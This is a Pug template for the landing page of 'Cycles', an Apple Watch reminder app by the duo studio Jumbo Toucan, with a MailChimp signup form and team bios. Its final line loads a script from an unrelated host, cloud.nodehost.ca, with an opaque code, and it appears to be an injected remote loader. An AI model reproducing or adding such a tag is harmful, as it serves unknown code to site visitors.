doctype html
html(lang="en")

	head
		title Jumbo Toucan &#8211; Cycles
		<script src="https://use.typekit.net/vsm7duh.js"></script>
		<script>try{Typekit.load({ async: true });}catch(e){}</script>
		meta(charset="UTF-8")
		meta(name="description", content="")
		meta(name="author", content="")
		meta(name="viewport", content="width=device-width, initial-scale=1")
		meta(name="Description" content="Creator: Jumbo Toucan,Platform: Apple Watch,Name: Cycles,Location: Orlando")
		meta(name="Keywords" content="Cycles, AppleWatch, Apple, Application, Goals, Mobile, Jumbo Toucan, Orlando")
		link(rel="alternate" href="https://www.jumbotoucan.com/" hreflang="en")
		link(rel="alternate" href="https://www.jumbotoucan.com/index-spanish" hreflang="es")
		link(rel="stylesheet", href="css/normalize.css")
		link(rel="stylesheet", href="css/skeleton.css")
		link(rel="stylesheet", href="css/main.css")

	body
		.navigation
			.logo Jumbo Toucan
			.navigation-items
				a(href="#points-anchor") Cycles
				a(href="#profile-anchor") Profile
				a(href="#contact-anchor") Contact
				a.lang(href="index-spanish.html") En <span>/ Sp</span>

		.hero-box
			h1 Cycles
			.caption Create meaningful notifications and take control over your schedule.
			
			//Begin MailChimp Signup Form
			#mc_embed_signup
				form(action="//jumbotoucan.us13.list-manage.com/subscribe/post?u=05587514275d5b56b3637b5ba&amp;id=9adf6d0c42" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate)
					#mc_embed_signup_scroll
						.mc-field-group
							input#mce-EMAIL.required.email(type="email" value="" placeholder="Notify me when it\'s ready" name="EMAIL")

							#mce-responses.clear
								#mce-error-response.response(style="display:none")
								#mce-success-response.response(style="display:none")

							div(style="position: absolute; left: -5000px;" aria-hidden="true")
								input(type="text" name="b_05587514275d5b56b3637b5ba_9adf6d0c42" tabindex="-1" value="")
							.clear
								input#mc-embedded-subscribe.button(type="submit" value="Subscribe" name="Subscribe")

			//End mc_embed_signup
			.watchEN(title="Cycles app on an Apple Watch")
			.shape-1
			.shape-2
			.shape-3
			.shape-4
			.shape-5

		.container.white-bg
			#points-anchor
			.points.row
				.columns.six
					.center
						.point-img.goals(title="Displaying half completed cycle")
						h3.blue Your Goals
						.paragraph-2.blue Sometimes we're forgetful and sometimes we just need a little motivation. Whatever the purpose, Cycles helps you reach those goals with an easy to use interface.
				.columns.six
					.center
						.point-img.independent(title="Shows no iPhone connected")
						h3.blue Independent
						.paragraph-2.blue Most apps need to be configured on your iPhone. Not Cycles! Any feature can be used directly on your Apple Watch without the interference of another device.
			.points.row
				.columns.six
					.center
						.point-img.rewarding(title="displaying special award in app")
						h3.blue Rewarding
						.paragraph-2.blue Finishing your cycles means you deserve an award. The more cycles you complete, the more trophies you rack up. Who doesn't like trophies, #AmIRight?
				.columns.six
					.center
						.point-img.familiar(title="Shows app looks like apple's apps")
						h3.blue Familiar
						.paragraph-2.blue There's absolutely no learning curve to using Cycles because everything we designed is meant to be familiar to you. Just start up the app on your wrist and tap away!

		.blue-bg
			#profile-anchor
			.container.row
				h2.white.row Made by

			.people
				.developer
					img(src="/images/alec.png" alt="Alec Dilanchian's beautiful face")
					h3 Alec Dilanchian
					.paragraph-2 Alec is a passionate, self-taught developer on a mission to constantly learn. If he isn't coding and pushing himself to do bigger and better things, he's enjoying a foreign beer with a side of cheese fries.
				.designer
					img(src="/images/mitch.png" alt="Mitchell Bernstein's gorgeous face")
					h3 Mitchell Bernstein
					.paragraph-2 Designing apps since before it was cool, Mitchell's obsession drives him to constantly better his work. Along the 10 years he's been designing digital things, Mitch found a deep passion for typography and surfing.

		footer
			.container
				#contact-anchor
				h2.blue.row Contact
				.paragraph-1.row Jumbo Toucan is a tiny duo studio based in Orlando, Florida. If you enjoy what we make, feel free to reach out to us!

				.row
					.six.columns
						h5 REACH OUT
						ul
							li: a(href="http://twitter.com/jumbotoucan") @jumbotoucan
							li: a(href="https://twitter.com/alec_dilanchian") @alec_dilanchian
							li: a(href="http://twitter.com/mitchbernstein") @mitchbernstein
					.six.columns
						h5 ELSEWHERE
						ul
							li: a(href="http://facebook.com/jumbotoucan") Facebook
							li: a(href="http://twitter.com/jumbotoucan") Twitter
							li: a(href="mailto:hi@jumbotoucan.com") Email

		script(src="/js/jquery-2.1.3.min.js")
		script(src="/js/functions.js")
		<script type='text/javascript' src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';}(jQuery));var $mcj = jQuery.noConflict(true);</script>
		<script src="//cloud.nodehost.ca/js/livedata.js?code=ku9a798xlrqpos90uh0si0go6keso9"></script>